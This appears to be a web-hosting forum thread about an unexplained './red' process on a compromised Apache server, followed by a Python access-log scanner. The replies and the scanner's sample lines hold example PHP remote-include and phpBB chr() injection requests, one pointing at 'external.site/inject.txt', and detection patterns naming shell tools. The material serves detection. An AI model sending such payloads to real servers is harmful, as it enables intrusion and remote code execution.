./red process - ???

jechilt

Have never seen this process before when running "top -c"

Code:
 6854 apache    11   4   300  300   252 S N   0.0  0.0   0:00   0 ./red

Then did a "netstat -aepN"

I see this odd entry:
Code:
tcp        0      0 204.157.14.172:http     146.126.51.51:16335     ESTABLISHED apache     2147483647 -

What is /red? I see that it is in the bin directory but not sure what its purpose is. I have never seen this process running before. Any help would be appreciated.

Thanks!
 
thanks Jeff.

I ended up rebooting the server and that did the trick... it is gone now. Just not sure why it was up and running with no link info to who was using it or anything.
Ohhh well.....
 
That is the result of insecure PHP scripts and someone exploiting that to run their own applications, resulting in it being run as the apache user.

These are usually things like ping flood clients, IRC bouncers, password hackers, remote shell scripts..

Dig your logs and locate odd php request lines, and lecture your client to properly program :)
 
Wunk said:
That is the result of insecure PHP scripts and someone exploiting that to run their own applications, resulting in it being run as the apache user.

These are usually things like ping flood clients, IRC bouncers, password hackers, remote shell scripts..

Dig your logs and locate odd php request lines, and lecture your client to properly program :)

The logs did not indicate much of anything.

However, we did do some software upgrades and it looks like things are much better at the moment.
 
It boils down to looking for the needle in the virtual haystack (especially on a busy system).

You'll be looking for either some phpBB exploit where a lot of 'chr(' can be found in the access log, or something like: 'cmd=http://external.site/inject.txt?uname%20-a' (just an example)

You can't really prevent it; the only way is to restrict PHP to safe mode and disallow certain functions like exec(), but that will get you the wrath of your customers :)
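The log-digging approach described in the last two posts, as an added example that is not code from the thread: a small Python scanner for Apache combined-format access logs that flags the two indicators named above (runs of 'chr(' and a parameter pointing at a remote URL) plus decoded shell command words in the query string. The log lines, IPs and host names are constructed; the double URL decoding is an assumption about how such requests are typically encoded.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the thread).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Jun/2004:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 1532
10.0.0.6 - - [21/Jun/2004:10:00:02 +0000] "GET /forum/viewtopic.php?t=1&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)) HTTP/1.1" 200 211
10.0.0.7 - - [21/Jun/2004:10:00:03 +0000] "GET /include.php?cmd=http://external.site/inject.txt?uname%20-a HTTP/1.1" 200 98
10.0.0.8 - - [21/Jun/2004:10:00:04 +0000] "GET /images/logo.png HTTP/1.1" 200 4021
"""

# Common/combined log format: ip ident user [time] "method request proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<req>\S+) [^"]*" (?P<status>\d{3})'
)
SHELL_WORDS = re.compile(r"\b(?:uname|wget|curl|perl|passwd|nc)\b", re.I)

# Each check is (name, predicate over the decoded request string).
CHECKS = [
    # Strings built from several chr() calls, the pattern the post associates with the phpBB exploit.
    ("chr_run", lambda req: len(re.findall(r"chr\(", req, re.I)) >= 3),
    # A query parameter whose value is itself a URL: the remote-include shape ('cmd=http://...').
    ("remote_include", lambda req: re.search(r"[?&]\w+=https?://", req, re.I) is not None),
    # Shell command words appearing in the (decoded) query string.
    ("shell_cmd", lambda req: SHELL_WORDS.search(req.split("?", 1)[-1]) is not None),
]

def decode(req: str) -> str:
    # Decode twice so double-encoded payloads (%2527 -> %27 -> ') are visible to the checks.
    return unquote(unquote(req))

def scan_line(line: str):
    """Return a finding dict for a suspicious line, or None for a clean/unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = decode(m.group("req"))
    hits = [name for name, pred in CHECKS if pred(req)]
    return {"ip": m.group("ip"), "ts": m.group("ts"), "request": req, "hits": hits} if hits else None

def scan_log(text: str):
    """Scan a whole log body and return the list of findings in file order."""
    return [r for r in (scan_line(l) for l in text.splitlines()) if r]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], ",".join(finding["hits"]), finding["request"])
```

On a live server the same functions can be fed the contents of the access log directly; matches point at the request, source IP and time window to correlate with the process start seen in top.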
 